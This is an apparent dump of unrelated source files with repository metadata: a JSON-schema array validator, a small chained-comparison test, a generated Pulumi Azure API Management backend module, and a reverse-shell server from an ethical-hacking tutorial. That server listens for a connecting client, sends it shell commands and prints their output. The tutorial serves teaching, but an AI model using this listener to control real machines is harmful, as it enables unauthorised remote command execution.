"Constructing ArrayValidator with {} and {}",
item_constraint,
addl_constraints,
)
)
from python_jsonschema_objects import classbuilder
klassbuilder = addl_constraints.pop(
"classbuilder", None
) # type: python_jsonschema_objects.classbuilder.ClassBuilder
props = {}
if item_constraint is not None:
if isinstance(item_constraint, (tuple, list)):
for i, elem in enumerate(item_constraint):
isdict = isinstance(elem, (dict,))
isklass = isinstance(elem, type) and util.safe_issubclass(
elem, (classbuilder.ProtocolBase, classbuilder.LiteralValue)
)
if not any([isdict, isklass]):
raise TypeError(
"Item constraint (position {0}) is not a schema".format(i)
)
elif isinstance(
item_constraint, (classbuilder.TypeProxy, classbuilder.TypeRef)
):
pass
elif util.safe_issubclass(item_constraint, ArrayWrapper):
pass
else:
isdict = isinstance(item_constraint, (dict,))
isklass = isinstance(item_constraint, type) and util.safe_issubclass(
item_constraint,
(classbuilder.ProtocolBase, classbuilder.LiteralValue),
)
if not any([isdict, isklass]):
raise TypeError("Item constraint is not a schema")
if isdict and "$ref" in item_constraint:
if klassbuilder is None:
raise TypeError(
"Cannot resolve {0} without classbuilder".format(
item_constraint["$ref"]
)
)
item_constraint = klassbuilder.resolve_type(
item_constraint["$ref"], name
)
elif isdict and item_constraint.get("type") == "array":
# We need to create a sub-array validator.
item_constraint = ArrayWrapper.create(
name + "#sub",
item_constraint=item_constraint["items"],
addl_constraints=item_constraint,
)
elif isdict and "oneOf" in item_constraint:
# We need to create a TypeProxy validator
uri = "{0}_{1}".format(name, "<anonymous_list_type>")
type_array = klassbuilder.construct_objects(
item_constraint["oneOf"], uri
)
item_constraint = classbuilder.TypeProxy(type_array)
elif isdict and item_constraint.get("type") == "object":
"""We need to create a ProtocolBase object for this anonymous definition"""
uri = "{0}_{1}".format(name, "<anonymous_list_type>")
item_constraint = klassbuilder.construct(uri, item_constraint)
props["__itemtype__"] = item_constraint
strict = addl_constraints.pop("strict", False)
props["_strict_"] = strict
props.update(addl_constraints)
validator = type(str(name), (ArrayWrapper,), props)
return validator
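if __name__ == "__main__":
    # Illustrative sketch (not part of the library API surface): create()
    # returns a new validator *class*; instantiating it wraps a concrete list
    # and validate() enforces the constraints declared at creation time.
    StringArray = ArrayWrapper.create(
        "StringArray", item_constraint={"type": "string"}, minItems=1
    )
    arr = StringArray(["a", "b"])
    arr.validate()  # raises ValidationError on length/type violations
    print(arr.for_json())  # ["a", "b"]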
|
67054ae3579c2b254223f3232a8c79ae42dbbc9d
|
c5a69158ac5966d8ba8f3b2e2fb4c35d49a0658d
|
/tests/compare.py
|
bc4bb5bc9f2211c76bd8635b41d0153ae6586536
|
[
"MIT"
] |
permissive
|
csvoss/onelinerizer
|
d47202733f1b6935146b05027381bea9fbde0d04
|
bad341f261d35e56872b4c22297a44dc6d5cfab3
|
refs/heads/master
| 2022-07-06T05:51:02.018368
| 2022-01-15T18:43:08
| 2022-01-15T18:43:08
| 29,375,764
| 1,126
| 102
|
MIT
| 2018-10-20T00:41:35
| 2015-01-17T01:32:08
|
Python
|
UTF-8
|
Python
| false
| false
| 30
|
py
|
compare.py
|
x = 3
y = 4
print(x < y < 5)
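# chained comparison: `x < y < 5` evaluates as `(x < y) and (y < 5)` with
# `y` evaluated only once -- presumably the behavior this test input checks
# that the onelinerizer preserves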
|
cae9fd9a6ab27b98a23479bb3308c6d5adbc2af9
|
f487532281c1c6a36a5c62a29744d8323584891b
|
/sdk/python/pulumi_azure/apimanagement/backend.py
|
753a3c14cadd6cd952376db7c486cd005a7fe009
|
[
"MPL-2.0",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure
|
a8f8f21c46c802aecf1397c737662ddcc438a2db
|
c16962e5c4f5810efec2806b8bb49d0da960d1ea
|
refs/heads/master
| 2023-08-25T00:17:05.290397
| 2023-08-24T06:11:55
| 2023-08-24T06:11:55
| 103,183,737
| 129
| 57
|
Apache-2.0
| 2023-09-13T05:44:10
| 2017-09-11T20:19:15
|
Java
|
UTF-8
|
Python
| false
| false
| 32,879
|
py
|
backend.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BackendArgs', 'Backend']
@pulumi.input_type
class BackendArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
protocol: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
url: pulumi.Input[str],
credentials: Optional[pulumi.Input['BackendCredentialsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input['BackendProxyArgs']] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input['BackendServiceFabricClusterArgs']] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input['BackendTlsArgs']] = None):
"""
The set of arguments for constructing a Backend resource.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] url: The URL of the backend host.
:param pulumi.Input['BackendCredentialsArgs'] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input['BackendProxyArgs'] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input['BackendServiceFabricClusterArgs'] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input['BackendTlsArgs'] tls: A `tls` block as documented below.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "url", url)
if credentials is not None:
pulumi.set(__self__, "credentials", credentials)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if proxy is not None:
pulumi.set(__self__, "proxy", proxy)
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
if service_fabric_cluster is not None:
pulumi.set(__self__, "service_fabric_cluster", service_fabric_cluster)
if title is not None:
pulumi.set(__self__, "title", title)
if tls is not None:
pulumi.set(__self__, "tls", tls)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
"""
The protocol used by the backend host. Possible values are `http` or `soap`.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def url(self) -> pulumi.Input[str]:
"""
The URL of the backend host.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: pulumi.Input[str]):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def credentials(self) -> Optional[pulumi.Input['BackendCredentialsArgs']]:
"""
A `credentials` block as documented below.
"""
return pulumi.get(self, "credentials")
@credentials.setter
def credentials(self, value: Optional[pulumi.Input['BackendCredentialsArgs']]):
pulumi.set(self, "credentials", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the backend.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management backend. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def proxy(self) -> Optional[pulumi.Input['BackendProxyArgs']]:
"""
A `proxy` block as documented below.
"""
return pulumi.get(self, "proxy")
@proxy.setter
def proxy(self, value: Optional[pulumi.Input['BackendProxyArgs']]):
pulumi.set(self, "proxy", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="serviceFabricCluster")
def service_fabric_cluster(self) -> Optional[pulumi.Input['BackendServiceFabricClusterArgs']]:
"""
A `service_fabric_cluster` block as documented below.
"""
return pulumi.get(self, "service_fabric_cluster")
@service_fabric_cluster.setter
def service_fabric_cluster(self, value: Optional[pulumi.Input['BackendServiceFabricClusterArgs']]):
pulumi.set(self, "service_fabric_cluster", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
The title of the backend.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def tls(self) -> Optional[pulumi.Input['BackendTlsArgs']]:
"""
A `tls` block as documented below.
"""
return pulumi.get(self, "tls")
@tls.setter
def tls(self, value: Optional[pulumi.Input['BackendTlsArgs']]):
pulumi.set(self, "tls", value)
@pulumi.input_type
class _BackendState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input['BackendCredentialsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input['BackendProxyArgs']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input['BackendServiceFabricClusterArgs']] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input['BackendTlsArgs']] = None,
url: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Backend resources.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input['BackendCredentialsArgs'] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input['BackendProxyArgs'] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input['BackendServiceFabricClusterArgs'] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input['BackendTlsArgs'] tls: A `tls` block as documented below.
:param pulumi.Input[str] url: The URL of the backend host.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if credentials is not None:
pulumi.set(__self__, "credentials", credentials)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if proxy is not None:
pulumi.set(__self__, "proxy", proxy)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
if service_fabric_cluster is not None:
pulumi.set(__self__, "service_fabric_cluster", service_fabric_cluster)
if title is not None:
pulumi.set(__self__, "title", title)
if tls is not None:
pulumi.set(__self__, "tls", tls)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def credentials(self) -> Optional[pulumi.Input['BackendCredentialsArgs']]:
"""
A `credentials` block as documented below.
"""
return pulumi.get(self, "credentials")
@credentials.setter
def credentials(self, value: Optional[pulumi.Input['BackendCredentialsArgs']]):
pulumi.set(self, "credentials", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the backend.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management backend. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
The protocol used by the backend host. Possible values are `http` or `soap`.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter
def proxy(self) -> Optional[pulumi.Input['BackendProxyArgs']]:
"""
A `proxy` block as documented below.
"""
return pulumi.get(self, "proxy")
@proxy.setter
def proxy(self, value: Optional[pulumi.Input['BackendProxyArgs']]):
pulumi.set(self, "proxy", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="serviceFabricCluster")
def service_fabric_cluster(self) -> Optional[pulumi.Input['BackendServiceFabricClusterArgs']]:
"""
A `service_fabric_cluster` block as documented below.
"""
return pulumi.get(self, "service_fabric_cluster")
@service_fabric_cluster.setter
def service_fabric_cluster(self, value: Optional[pulumi.Input['BackendServiceFabricClusterArgs']]):
pulumi.set(self, "service_fabric_cluster", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
The title of the backend.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def tls(self) -> Optional[pulumi.Input['BackendTlsArgs']]:
"""
A `tls` block as documented below.
"""
return pulumi.get(self, "tls")
@tls.setter
def tls(self, value: Optional[pulumi.Input['BackendTlsArgs']]):
pulumi.set(self, "tls", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the backend host.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
class Backend(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input[pulumi.InputType['BackendCredentialsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input[pulumi.InputType['BackendProxyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']]] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[pulumi.InputType['BackendTlsArgs']]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a backend within an API Management Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_service = azure.apimanagement.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
publisher_name="My Company",
publisher_email="company@exmaple.com",
sku_name="Developer_1")
example_backend = azure.apimanagement.Backend("exampleBackend",
resource_group_name=example_resource_group.name,
api_management_name=example_service.name,
protocol="http",
url="https://backend")
```
## Import
API Management backends can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/backend:Backend example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.ApiManagement/service/instance1/backends/backend1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['BackendCredentialsArgs']] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input[pulumi.InputType['BackendProxyArgs']] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input[pulumi.InputType['BackendTlsArgs']] tls: A `tls` block as documented below.
:param pulumi.Input[str] url: The URL of the backend host.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BackendArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a backend within an API Management Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_service = azure.apimanagement.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
publisher_name="My Company",
publisher_email="company@exmaple.com",
sku_name="Developer_1")
example_backend = azure.apimanagement.Backend("exampleBackend",
resource_group_name=example_resource_group.name,
api_management_name=example_service.name,
protocol="http",
url="https://backend")
```
## Import
API Management backends can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/backend:Backend example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.ApiManagement/service/instance1/backends/backend1
```
:param str resource_name: The name of the resource.
:param BackendArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BackendArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input[pulumi.InputType['BackendCredentialsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input[pulumi.InputType['BackendProxyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']]] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[pulumi.InputType['BackendTlsArgs']]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BackendArgs.__new__(BackendArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["credentials"] = credentials
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy"] = proxy
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["service_fabric_cluster"] = service_fabric_cluster
__props__.__dict__["title"] = title
__props__.__dict__["tls"] = tls
if url is None and not opts.urn:
raise TypeError("Missing required property 'url'")
__props__.__dict__["url"] = url
super(Backend, __self__).__init__(
'azure:apimanagement/backend:Backend',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
credentials: Optional[pulumi.Input[pulumi.InputType['BackendCredentialsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy: Optional[pulumi.Input[pulumi.InputType['BackendProxyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
service_fabric_cluster: Optional[pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']]] = None,
title: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[pulumi.InputType['BackendTlsArgs']]] = None,
url: Optional[pulumi.Input[str]] = None) -> 'Backend':
"""
Get an existing Backend resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['BackendCredentialsArgs']] credentials: A `credentials` block as documented below.
:param pulumi.Input[str] description: The description of the backend.
:param pulumi.Input[str] name: The name of the API Management backend. Changing this forces a new resource to be created.
:param pulumi.Input[str] protocol: The protocol used by the backend host. Possible values are `http` or `soap`.
:param pulumi.Input[pulumi.InputType['BackendProxyArgs']] proxy: A `proxy` block as documented below.
:param pulumi.Input[str] resource_group_name: The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
:param pulumi.Input[pulumi.InputType['BackendServiceFabricClusterArgs']] service_fabric_cluster: A `service_fabric_cluster` block as documented below.
:param pulumi.Input[str] title: The title of the backend.
:param pulumi.Input[pulumi.InputType['BackendTlsArgs']] tls: A `tls` block as documented below.
:param pulumi.Input[str] url: The URL of the backend host.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BackendState.__new__(_BackendState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["credentials"] = credentials
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy"] = proxy
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["service_fabric_cluster"] = service_fabric_cluster
__props__.__dict__["title"] = title
__props__.__dict__["tls"] = tls
__props__.__dict__["url"] = url
return Backend(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The Name of the API Management Service where this backend should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter
def credentials(self) -> pulumi.Output[Optional['outputs.BackendCredentials']]:
"""
A `credentials` block as documented below.
"""
return pulumi.get(self, "credentials")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the backend.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the API Management backend. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
The protocol used by the backend host. Possible values are `http` or `soap`.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter
def proxy(self) -> pulumi.Output[Optional['outputs.BackendProxy']]:
"""
A `proxy` block as documented below.
"""
return pulumi.get(self, "proxy")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The Name of the Resource Group where the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[Optional[str]]:
"""
The management URI of the backend host in an external system. This URI can be the ARM Resource ID of Logic Apps, Function Apps or API Apps, or the management endpoint of a Service Fabric cluster.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="serviceFabricCluster")
def service_fabric_cluster(self) -> pulumi.Output[Optional['outputs.BackendServiceFabricCluster']]:
"""
A `service_fabric_cluster` block as documented below.
"""
return pulumi.get(self, "service_fabric_cluster")
@property
@pulumi.getter
def title(self) -> pulumi.Output[Optional[str]]:
"""
The title of the backend.
"""
return pulumi.get(self, "title")
@property
@pulumi.getter
def tls(self) -> pulumi.Output[Optional['outputs.BackendTls']]:
"""
A `tls` block as documented below.
"""
return pulumi.get(self, "tls")
@property
@pulumi.getter
def url(self) -> pulumi.Output[str]:
"""
The URL of the backend host.
"""
return pulumi.get(self, "url")
|
e90c7f3f134728e19ef8b3fb945e1aacb992bc24
|
d05c946e345baa67e7894ee33ca21e24b8d26028
|
/ethical-hacking/reverse_shell/server.py
|
e143aed2ee354d92cf4bbd6b2653cf1e2f80005a
|
[
"MIT"
] |
permissive
|
x4nth055/pythoncode-tutorials
|
327255550812f84149841d56f2d13eaa84efd42e
|
d6ba5d672f7060ba88384db5910efab1768c7230
|
refs/heads/master
| 2023-09-01T02:36:58.442748
| 2023-08-19T14:04:34
| 2023-08-19T14:04:34
| 199,449,624
| 1,858
| 2,055
|
MIT
| 2023-08-25T20:41:56
| 2019-07-29T12:35:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,539
|
py
|
server.py
|
import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
# separator string for sending 2 messages in one go
SEPARATOR = "<sep>"
# create a socket object
s = socket.socket()
# make the port reusable; SO_REUSEADDR must be set *before* bind() to take
# effect -- without it, re-running the server on Linux raises an
# "Address already in use" error
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
# receiving the current working directory of the client
cwd = client_socket.recv(BUFFER_SIZE).decode()
print("[+] Current working directory:", cwd)
while True:
# get the command from prompt
command = input(f"{cwd} $> ")
if not command.strip():
# empty command
continue
# send the command to the client
client_socket.send(command.encode())
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# retrieve command results
output = client_socket.recv(BUFFER_SIZE).decode()
print("output:", output)
# split command output and current directory
results, cwd = output.split(SEPARATOR)
# print output
print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
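# The matching client (sketch, assuming the tutorial's client-side
# counterpart): on connect it sends its current working directory, then
# loops -- receive a command, execute it locally, and reply with
# "<output><sep><new cwd>", closing when it receives "exit".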
|
33b8b468afd041fe46930d44ee8f53f426201d33
|
97d7455fbaa56813e97cf601e4a23786d47c2e2c
|
/general_itests/steps/run_steps.py
|
b332f8e91110cec4f042f2d2982bc4c3ef485aa5
|
[
"Apache-2.0"
] |
permissive
|
Yelp/paasta
|
9138fbb0beaaa6146520c1483144679f9d5d4941
|
6fafc7c86073f136e64b959b963994be3d6160ab
|
refs/heads/master
| 2023-08-17T00:00:47.610727
| 2023-08-10T21:40:26
| 2023-08-10T21:40:26
| 44,998,824
| 1,805
| 291
|
Apache-2.0
| 2023-09-13T20:40:04
| 2015-10-26T21:35:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,035
|
py
|
run_steps.py
|
